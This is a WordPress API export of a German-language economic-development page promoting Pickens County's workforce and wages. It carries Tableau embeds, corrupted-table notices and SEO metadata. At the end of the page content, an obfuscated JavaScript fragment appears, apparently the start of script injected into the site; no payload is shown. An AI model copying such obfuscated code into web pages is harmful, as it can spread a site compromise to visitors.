{"id":8483,"date":"2020-10-28T16:08:11","date_gmt":"2020-10-28T16:08:11","guid":{"rendered":"http:\/\/alliancepickens.com\/geschaeftsklima\/marktbedingungen\/"},"modified":"2020-12-09T20:27:28","modified_gmt":"2020-12-09T20:27:28","slug":"marktbedingungen","status":"publish","type":"page","link":"https:\/\/alliancepickens.com\/de\/geschaeftsklima\/marktbedingungen\/","title":{"rendered":"Marktbedingungen"},"content":{"rendered":"<div class=\"wpb-content-wrapper\"><p>[vc_row el_class=&#8221;intro&#8221; el_id=&#8221;availability&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]Eine diversifizierte Industriebasis bl\u00fcht in Pickens County.South Carolina.USA weiter auf. Faktoren wie die kontinuierliche Produktentwicklung von Standorten, der Marktzugang f\u00fcr den internationalen Handel und attraktive Anreizpakete tragen dazu bei, die Anforderungen von Standortverlagerungen oder Gesch\u00e4ftserweiterungen zu erf\u00fcllen.<\/p>\n<p>&nbsp;<\/p>\n<h2>Verf\u00fcgbarkeit<\/h2>\n<p>Mit fast 50.000 Besch\u00e4ftigten in der 45-min\u00fctigen Arbeitszeit-Arbeitszeit des Landkreises haben neue und bestehende Unternehmen Zugang zu einer gro\u00dfen und vielf\u00e4ltigen Gruppe potenzieller Mitarbeiter. South Carolina genie\u00dft stabile Arbeitgeber-Arbeitnehmer-Beziehungen als Einrecht auf Arbeit und Arbeits-zu-Will-Zustand. Unternehmen, die expandieren oder in die Region umziehen m\u00f6chten, profitieren von einem qualitativ hochwertigen Arbeitskr\u00e4ftepool, der durch eine hervorragende technische Schulungsinfrastruktur unterst\u00fctzt wird.<\/p>\n<p>Der Arbeitspool ist von der 45-min\u00fctigen Fahrzeitforschung des Appalachen-Regierungsrates abgeleitet. Der Ursprung der Fahrzeit befindet sich im Pickens County Commerce Park. F\u00fcr eine detaillierte \u00dcberpr\u00fcfung der Arbeitsaufnahme nach einer bestimmten Eigenschaft wenden Sie sich bitte an <a href=\"http:\/\/alliancepickens.com\/de\/ueber-uns\/#contact_directions\">Alliance Pickens<\/a>.[\/vc_column_text][\/vc_column][vc_column width=&#8221;1\/3&#8243;][vc_wp_custommenu title=&#8221;In diesem Abschnitt&#8221; nav_menu=&#8221;18&#8243; el_class=&#8221;inthissection&#8221;][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text el_class=&#8221;tableau&#8221;]<\/p>\n<div id=\"viz1602084461637\" class=\"tableauPlaceholder\" style=\"position: relative;\"><noscript><a href=\"#\"><img decoding=\"async\" alt=\" \" src=\"https:\/\/public.tableau.com\/static\/images\/AP\/AP_PopulationTables\/PopulationTotals\/1_rss.png\" style=\"border: none\"><\/a><\/noscript><object class=\"tableauViz\" style=\"display: none;\" width=\"300\" height=\"150\"><param name=\"host_url\" value=\"https%3A%2F%2Fpublic.tableau.com%2F\" \/><param name=\"embed_code_version\" value=\"3\" \/><param name=\"site_root\" value=\"\" \/><param name=\"name\" value=\"AP_PopulationTables\/PopulationTotals\" \/><param name=\"tabs\" value=\"yes\" \/><param name=\"toolbar\" value=\"yes\" \/><param name=\"static_image\" value=\"https:\/\/public.tableau.com\/static\/images\/AP\/AP_PopulationTables\/PopulationTotals\/1.png\" \/><param name=\"animate_transition\" value=\"yes\" \/><param name=\"display_static_image\" value=\"yes\" \/><param name=\"display_spinner\" value=\"yes\" \/><param name=\"display_overlay\" value=\"yes\" \/><param name=\"display_count\" value=\"yes\" \/><param name=\"language\" value=\"en\" \/><\/object><\/div>\n<p><script type=\"text\/javascript\"> var divElement = document.getElementById('viz1602084461637'); var vizElement = divElement.getElementsByTagName('object')[0]; vizElement.style.width='1015px';vizElement.style.height='750px'; var scriptElement = document.createElement('script'); scriptElement.src = 'https:\/\/public.tableau.com\/javascripts\/api\/viz_v1.js'; vizElement.parentNode.insertBefore(scriptElement, vizElement); [\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=\"stretch_row\" bg_type=\"bg_color\" bg_color_value=\"#e3e3e3\" css=\".vc_custom_1602106944486{padding-top: 50px !important;padding-bottom: 50px !important;}\" el_class=\"greybar\"][vc_column width=\"1\/4\" css=\".vc_custom_1602106834271{background-color: #ffffff !important;}\"][vc_column_text]<\/p>\n<h3>Arbeitslosigkeit<\/h3>\n<p>Aufgrund der F\u00e4higkeit und soliden Arbeitsmoral seiner Bewohner ist die <a href=\"http:\/\/alliancepickens.hosted.civiclive.com\/cms\/One.aspx?portalId=10351&amp;pageId=11618\">Arbeitslosenquote<\/a> im Pickens County eine der niedrigsten im Staat. Aktuelle Informationen finden Sie auf der SC DEW Website.[\/vc_column_text][\/vc_column][vc_column width=\"1\/4\" css=\".vc_custom_1602106840509{background-color: #ffffff !important;}\"][vc_column_text]<\/p>\n<h3>Unterbesch\u00e4ftigung<\/h3>\n<p>Pickens County-Unternehmen haben auch Zugang zu einer Reihe potenzieller Mitarbeiter, die derzeit einen Arbeitsplatz haben, aber <a href=\"http:\/\/alliancepickens.hosted.civiclive.com\/cms\/One.aspx?portalId=10351&amp;pageId=11624\">\u00fcber die Ausbildung, Erfahrung und Ausbildung verf\u00fcgen, <\/a>die sie f\u00fcr einen besseren Job qualifiziert.[\/vc_column_text][\/vc_column][vc_column width=\"1\/4\" css=\".vc_custom_1602106846938{background-color: #ffffff !important;}\"][vc_column_text]<\/p>\n<h3>Erwerbsbeteiligung<\/h3>\n<p>Die Erwerbsbeteiligung ist die Zahl der Personen, die sich um eine Stelle bewerben oder eine Stelle aus\u00fcben.[\/vc_column_text][\/vc_column][vc_column width=\"1\/4\" css=\".vc_custom_1602106856497{background-color: #ffffff !important;}\"][vc_column_text]<\/p>\n<h3>Pendelmuster<\/h3>\n<p>Pickens County Unternehmen haben den zus\u00e4tzlichen Vorteil, qualifizierte Mitarbeiter aus <a href=\"http:\/\/alliancepickens.hosted.civiclive.com\/cms\/One.aspx?portalId=10351&amp;pageId=11639\">der ganzen Region<\/a>zu gewinnen.[\/vc_column_text][\/vc_column][\/vc_row][vc_row][vc_column][vc_column_text el_class=\"tableau\"]<\/p>\n<div id=\"viz1602079985845\" class=\"tableauPlaceholder\" style=\"position: relative;\"><noscript><a href=\"#\"><img decoding=\"async\" alt=\" \" src=\"https:\/\/public.tableau.com\/static\/images\/Pk\/Pk_LABOR\/CurrentLaborForce\/1_rss.png\" style=\"border: none\"><\/a><\/noscript><object class=\"tableauViz\" style=\"display: none;\" width=\"300\" height=\"150\"><param name=\"host_url\" value=\"https%3A%2F%2Fpublic.tableau.com%2F\" \/><param name=\"embed_code_version\" value=\"3\" \/><param name=\"site_root\" value=\"\" \/><param name=\"name\" value=\"Pk_LABOR\/CurrentLaborForce\" \/><param name=\"tabs\" value=\"yes\" \/><param name=\"toolbar\" value=\"yes\" \/><param name=\"static_image\" value=\"https:\/\/public.tableau.com\/static\/images\/Pk\/Pk_LABOR\/CurrentLaborForce\/1.png\" \/><param name=\"animate_transition\" value=\"yes\" \/><param name=\"display_static_image\" value=\"yes\" \/><param name=\"display_spinner\" value=\"yes\" \/><param name=\"display_overlay\" value=\"yes\" \/><param name=\"display_count\" value=\"yes\" \/><param name=\"language\" value=\"en\" \/><param name=\"filter\" value=\"publish=yes\" \/><\/object><\/div>\n<p><script type=\"text\/javascript\"> var divElement = document.getElementById('viz1602079985845'); var vizElement = divElement.getElementsByTagName('object')[0]; if ( divElement.offsetWidth &gt; 800 ) { vizElement.style.width='1015px';vizElement.style.height='750px';} else if ( divElement.offsetWidth &gt; 500 ) { vizElement.style.width='1015px';vizElement.style.height='750px';} else { vizElement.style.minWidth='1015px';vizElement.style.maxWidth='100%';vizElement.style.height='1600px';} var scriptElement = document.createElement('script'); scriptElement.src = 'https:\/\/public.tableau.com\/javascripts\/api\/viz_v1.js'; vizElement.parentNode.insertBefore(scriptElement, vizElement); [\/vc_column_text][\/vc_column][\/vc_row][vc_row full_width=\"stretch_row\" parallax=\"content-moving\" parallax_image=\"10298\" el_class=\"parallaxbreak\"][vc_column][vc_empty_space height=\"450px\"][\/vc_column][\/vc_row][vc_row el_id=\"affordability\"][vc_column][vc_column_text]<\/p>\n<h2>Erschwinglichkeit<\/h2>\n<p>[\/vc_column_text][vc_tta_tabs][vc_tta_section title=\"L\u00f6hne: Alle Sektoren\" tab_id=\"1605029531774-039cd1d3-f69b\"][vc_column_text]Die Erschwinglichkeit der lokalen Arbeitskr\u00e4fte in allen Branchen erm\u00f6glicht es neuen und expandierenden Unternehmen in verschiedenen Branchen, Top-Talente zu erheblichen Kosteneinsparungen zu rekrutieren.[\/vc_column_text][vc_column_text]<div>Attention: The internal data of table \u201c1\u201d is corrupted!<\/div>[\/vc_column_text][\/vc_tta_section][vc_tta_section title=\"L\u00f6hne im verarbeitenden Gewerbe\" tab_id=\"1605029531814-ea77b366-3a2c\"][vc_column_text]Angesichts wachsender Bedenken hinsichtlich der Produktion im Ausland, wie steigende Arbeitskosten, steigende Transportkosten und schlechte Produktionsqualit\u00e4t, macht Pickens Countys <a href=\"http:\/\/alliancepickens.com\/de\/personalentwicklung\/ausbildung-personalentwicklung\/\">erschwingliche und qualifizierte Fertigungsarbeitskr\u00e4fte<\/a> das Gebiet zu einem idealen Standort f\u00fcr Unternehmen, die Expansion, Verlagerung oder Reshoring in Betracht ziehen.[\/vc_column_text][vc_column_text]<div>Attention: The internal data of table \u201c2\u201d is corrupted!<\/div>[\/vc_column_text][\/vc_tta_section][\/vc_tta_tabs][\/vc_column][\/vc_row][vc_row el_class=\"learnmoreabout\"][vc_column][vc_column_text]<\/p>\n<h4 style=\"text-align: center;\">Erfahren Sie mehr \u00fcber das Gesch\u00e4ftsklima<\/h4>\n<p>[\/vc_column_text][vc_wp_custommenu nav_menu=\"18\"][\/vc_column][\/vc_row][vc_row full_width=\"stretch_row\" parallax=\"content-moving\" parallax_image=\"3871\" el_class=\"getstarted\"][vc_column width=\"2\/3\"][vc_column_text]<\/p>\n<h1>Bereit f\u00fcr den Einstieg?<\/h1>\n<h3>Wir freuen uns auf ein Gespr\u00e4ch mit Ihnen!<\/h3>\n<p>[\/vc_column_text][\/vc_column][vc_column width=\"1\/3\"][vc_column_text]<a class=\"greenbtn\" href=\"http:\/\/alliancepickens.com\/de\/ueber-uns\/#contact_directions\">Kontaktieren Sie unser Team<\/a>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\nfunction _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);};<\/p>\n<\/div>","protected":false},"excerpt":{"rendered":"<p>[vc_row el_class=&#8221;intro&#8221; el_id=&#8221;availability&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]Eine diversifizierte Industriebasis bl\u00fcht in Pickens County.South Carolina.USA weiter auf. Faktoren wie die kontinuierliche Produktentwicklung von Standorten, der Marktzugang f\u00fcr den internationalen Handel und attraktive Anreizpakete tragen dazu bei, die Anforderungen von Standortverlagerungen oder Gesch\u00e4ftserweiterungen zu erf\u00fcllen. &nbsp; Verf\u00fcgbarkeit Mit fast 50.000 Besch\u00e4ftigten in der 45-min\u00fctigen Arbeitszeit-Arbeitszeit des Landkreises haben neue und&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":8354,"menu_order":20,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"class_list":["post-8483","page","type-page","status-publish","hentry","description-off"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.4 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Marktbedingungen - Alliance Pickens<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/alliancepickens.com\/de\/geschaeftsklima\/marktbedingungen\/\" \/>\n<meta property=\"og:locale\" content=\"de_DE\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Marktbedingungen - Alliance Pickens\" \/>\n<meta property=\"og:description\" content=\"[vc_row el_class=&#8221;intro&#8221; el_id=&#8221;availability&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]Eine diversifizierte Industriebasis bl\u00fcht in Pickens County.South Carolina.USA weiter auf. Faktoren wie die kontinuierliche Produktentwicklung von Standorten, der Marktzugang f\u00fcr den internationalen Handel und attraktive Anreizpakete tragen dazu bei, die Anforderungen von Standortverlagerungen oder Gesch\u00e4ftserweiterungen zu erf\u00fcllen. &nbsp; Verf\u00fcgbarkeit Mit fast 50.000 Besch\u00e4ftigten in der 45-min\u00fctigen Arbeitszeit-Arbeitszeit des Landkreises haben neue und&hellip;\" \/>\n<meta property=\"og:url\" content=\"https:\/\/alliancepickens.com\/de\/geschaeftsklima\/marktbedingungen\/\" \/>\n<meta property=\"og:site_name\" content=\"Alliance Pickens\" \/>\n<meta property=\"article:modified_time\" content=\"2020-12-09T20:27:28+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/public.tableau.com\/static\/images\/AP\/AP_PopulationTables\/PopulationTotals\/1_rss.png\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/geschaeftsklima\\\/marktbedingungen\\\/\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/geschaeftsklima\\\/marktbedingungen\\\/\",\"name\":\"Marktbedingungen - Alliance Pickens\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/geschaeftsklima\\\/marktbedingungen\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/geschaeftsklima\\\/marktbedingungen\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/public.tableau.com\\\/static\\\/images\\\/AP\\\/AP_PopulationTables\\\/PopulationTotals\\\/1_rss.png\",\"datePublished\":\"2020-10-28T16:08:11+00:00\",\"dateModified\":\"2020-12-09T20:27:28+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/geschaeftsklima\\\/marktbedingungen\\\/#breadcrumb\"},\"inLanguage\":\"de-DE\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/alliancepickens.com\\\/de\\\/geschaeftsklima\\\/marktbedingungen\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"de-DE\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/geschaeftsklima\\\/marktbedingungen\\\/#primaryimage\",\"url\":\"https:\\\/\\\/public.tableau.com\\\/static\\\/images\\\/AP\\\/AP_PopulationTables\\\/PopulationTotals\\\/1_rss.png\",\"contentUrl\":\"https:\\\/\\\/public.tableau.com\\\/static\\\/images\\\/AP\\\/AP_PopulationTables\\\/PopulationTotals\\\/1_rss.png\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/geschaeftsklima\\\/marktbedingungen\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Gesch\u00e4ftsklima\",\"item\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/geschaeftsklima\\\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Marktbedingungen\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/#website\",\"url\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/\",\"name\":\"Alliance Pickens\",\"description\":\"recruitment and expansion in Pickens County\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/alliancepickens.com\\\/de\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"de-DE\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Marktbedingungen - Alliance Pickens","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/alliancepickens.com\/de\/geschaeftsklima\/marktbedingungen\/","og_locale":"de_DE","og_type":"article","og_title":"Marktbedingungen - Alliance Pickens","og_description":"[vc_row el_class=&#8221;intro&#8221; el_id=&#8221;availability&#8221;][vc_column width=&#8221;2\/3&#8243;][vc_column_text]Eine diversifizierte Industriebasis bl\u00fcht in Pickens County.South Carolina.USA weiter auf. Faktoren wie die kontinuierliche Produktentwicklung von Standorten, der Marktzugang f\u00fcr den internationalen Handel und attraktive Anreizpakete tragen dazu bei, die Anforderungen von Standortverlagerungen oder Gesch\u00e4ftserweiterungen zu erf\u00fcllen. &nbsp; Verf\u00fcgbarkeit Mit fast 50.000 Besch\u00e4ftigten in der 45-min\u00fctigen Arbeitszeit-Arbeitszeit des Landkreises haben neue und&hellip;","og_url":"https:\/\/alliancepickens.com\/de\/geschaeftsklima\/marktbedingungen\/","og_site_name":"Alliance Pickens","article_modified_time":"2020-12-09T20:27:28+00:00","og_image":[{"url":"https:\/\/public.tableau.com\/static\/images\/AP\/AP_PopulationTables\/PopulationTotals\/1_rss.png","type":"","width":"","height":""}],"twitter_card":"summary_large_image","twitter_misc":{"Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/alliancepickens.com\/de\/geschaeftsklima\/marktbedingungen\/","url":"https:\/\/alliancepickens.com\/de\/geschaeftsklima\/marktbedingungen\/","name":"Marktbedingungen - Alliance Pickens","isPartOf":{"@id":"https:\/\/alliancepickens.com\/de\/#website"},"primaryImageOfPage":{"@id":"https:\/\/alliancepickens.com\/de\/geschaeftsklima\/marktbedingungen\/#primaryimage"},"image":{"@id":"https:\/\/alliancepickens.com\/de\/geschaeftsklima\/marktbedingungen\/#primaryimage"},"thumbnailUrl":"https:\/\/public.tableau.com\/static\/images\/AP\/AP_PopulationTables\/PopulationTotals\/1_rss.png","datePublished":"2020-10-28T16:08:11+00:00","dateModified":"2020-12-09T20:27:28+00:00","breadcrumb":{"@id":"https:\/\/alliancepickens.com\/de\/geschaeftsklima\/marktbedingungen\/#breadcrumb"},"inLanguage":"de-DE","potentialAction":[{"@type":"ReadAction","target":["https:\/\/alliancepickens.com\/de\/geschaeftsklima\/marktbedingungen\/"]}]},{"@type":"ImageObject","inLanguage":"de-DE","@id":"https:\/\/alliancepickens.com\/de\/geschaeftsklima\/marktbedingungen\/#primaryimage","url":"https:\/\/public.tableau.com\/static\/images\/AP\/AP_PopulationTables\/PopulationTotals\/1_rss.png","contentUrl":"https:\/\/public.tableau.com\/static\/images\/AP\/AP_PopulationTables\/PopulationTotals\/1_rss.png"},{"@type":"BreadcrumbList","@id":"https:\/\/alliancepickens.com\/de\/geschaeftsklima\/marktbedingungen\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/alliancepickens.com\/de\/"},{"@type":"ListItem","position":2,"name":"Gesch\u00e4ftsklima","item":"https:\/\/alliancepickens.com\/de\/geschaeftsklima\/"},{"@type":"ListItem","position":3,"name":"Marktbedingungen"}]},{"@type":"WebSite","@id":"https:\/\/alliancepickens.com\/de\/#website","url":"https:\/\/alliancepickens.com\/de\/","name":"Alliance Pickens","description":"recruitment and expansion in Pickens County","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/alliancepickens.com\/de\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"de-DE"}]}},"_links":{"self":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/pages\/8483","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/comments?post=8483"}],"version-history":[{"count":0,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/pages\/8483\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/pages\/8354"}],"wp:attachment":[{"href":"https:\/\/alliancepickens.com\/de\/wp-json\/wp\/v2\/media?parent=8483"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}